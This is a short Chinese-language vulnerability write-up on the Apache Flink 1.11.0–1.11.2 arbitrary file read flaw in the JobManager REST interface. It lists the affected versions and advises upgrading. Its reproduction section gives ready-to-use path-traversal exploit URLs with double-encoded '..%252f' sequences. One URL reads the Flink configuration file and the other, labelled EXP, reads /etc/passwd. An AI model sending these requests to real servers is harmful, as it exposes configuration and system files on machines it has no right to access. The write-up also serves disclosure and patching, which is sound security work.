0x01 漏洞描述
ApacheFlink是一个开源的流处理框架,具有强大的流处理和批处理功能。Apache Flink 1.11.0(以及1.11.1和1.11.2中发布的)中引入的更改允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统中的任何文件。
0x02 影响版本
Flink 1.11.0、1.11.1、1.11.2
0x03 漏洞复现
简单验证:
读取该文件可直接判断是否存在漏洞
http://192.168.1.1:8081/jobmanager/logs/..%252fconf%252fflink-conf.yaml
EXP:
http://192.168.1.1:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
0x04 修复建议
升级到1.11.3或1.12.0版本!